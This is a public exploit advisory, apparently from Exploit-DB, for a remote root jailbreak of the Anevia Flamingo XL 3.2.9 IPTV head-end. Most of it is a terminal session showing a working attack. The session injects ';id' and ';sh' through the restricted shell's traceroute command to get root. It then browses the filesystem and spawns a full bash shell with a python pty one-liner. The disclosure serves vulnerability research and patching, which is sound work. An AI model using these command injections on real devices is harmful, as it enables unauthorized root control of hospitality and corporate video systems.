Anevia Flamingo XL 3.2.9 – Remote Root Jailbreak

  • 作者: LiquidWorm
    日期: 2023-06-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51516/
  • Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
Hardware revision 1.0
SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can breakout of the restricted environment and have full root access
to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)
 Apache/2.2.15 (Unix)
 mod_ssl/2.2.15
 OpenSSL/0.9.8g
 DAV/2
 PHP/5.3.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php


13.04.2023

--


$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
bonding
config
date
dns
enable
ethconfig
exit
exp
firewall
help
hostname
http
igmpq
imp
ipconfig
license
log
mail
passwd
persistent_logs
ping
reboot
reset
route
serial
settings
sslconfig
tcpdump
timezone
traceroute
upgrade
uptime
version
vlanconfig

Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
[-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
[-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"
Options:
-FSet the don't fragment bit
-IUse ICMP ECHO instead of UDP datagrams
-lDisplay the ttl value of the returned packet
-dSet SO_DEBUG options to socket
-nPrint hop addresses numerically rather than symbolically
-rBypass the normal routing tables and send directly to a host
-vVerbose output
-m max_ttlSet the max time-to-live (max number of hops)
-p port#Set the base UDP port number used in probes
(default is 33434)
-q nqueries Set the number of probes per ``ttl'' to nqueries
(default is 3)
-s src_addr Use the following IP address as the source address
-t tosSet the type-of-service in probe packets to the following value
(default 0)
-w wait Set the time (in seconds) to wait for a response to a probe
(default 3 sec)
-gSpecify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x 19 root root 1024 Oct32022 .
drwxr-xr-x 19 root root 1024 Oct32022 ..
drwxr-xr-x2 root root 1024 Oct 212013 bin
drwxrwxrwt2 root root 40 Oct32022 cores
drwxr-xr-x 13 root root27648 May 22 00:53 dev
drwxr-xr-x3 root root 1024 Oct 212013 emul
drwxr-xr-x 48 1000 1000 3072 Oct32022 etc
drwxr-xr-x3 root root 1024 Oct32022 home
drwxr-xr-x 11 root root 3072 Oct 212013 lib
lrwxrwxrwx1 root root 20 Oct 212013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx1 root root3 Oct 212013 lib64 -> lib
drwx------2 root root12288 Oct 212013 lost+found
drwxr-xr-x4 root root 1024 Oct 212013 mnt
drwxrwxrwt2 root root 80 May 22 00:45 php_sessions
dr-xr-xr-x177 root root0 Oct32022 proc
drwxr-xr-x4 root root 1024 Oct 212013 root
drwxr-xr-x2 root root 2048 Oct 212013 sbin
drwxr-xr-x 12 root root0 Oct32022 sys
drwxrwxrwt 26 root root 1140 May 22 01:06 tmp
drwxr-xr-x 10 1000 1000 1024 Oct 212013 usr
drwxr-xr-x 14 root root 1024 Oct 212013 var

ls /var/www/admin
_img configuration.phplog_securemedia.phpstream_dump.php
_langcores_and_logs_management.phplogin.phpstream_services
_lib dataminer_handshake.phplogout.php streaming.php
_style dvbt.php logs.php support.php
about.phpdvbt_scan.phpmain.php template
ajax export.php manager.phptime.php
alarm.phpfileprogress.php network.phptoto.ts
alarm_view.php firewall.php pear upload_helper.php
authentication.php get_config power.phpuptime.php
bridges.phpget_enquiry_pending.phpread_settings.phpusbloader.php
cam.phpget_upgrade_error.phpreceive_helper.php version.php
channel.phpheartbeat.phprescrambling webradio.php
channel_xl_list.phpincluderescrambling.php webtv
check_stateinput.phpresilience webtv.php
classjs resilience.php xmltv.php
common license.phprestart_service.php
config_snmp.phplog.phpset_oem.php

python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x1 root root35896 Feb 212012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bondingfirewall mail timezone
config help passwd traceroute
date hostname persistent_logsupgrade
dbg-serial http ping uptime
dbg-set-oemigmpqrouteversion
dbg-updates-logimpserial vlanconfig
dnsipconfig settings
ethconfiglicensesslconfig
explogtcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]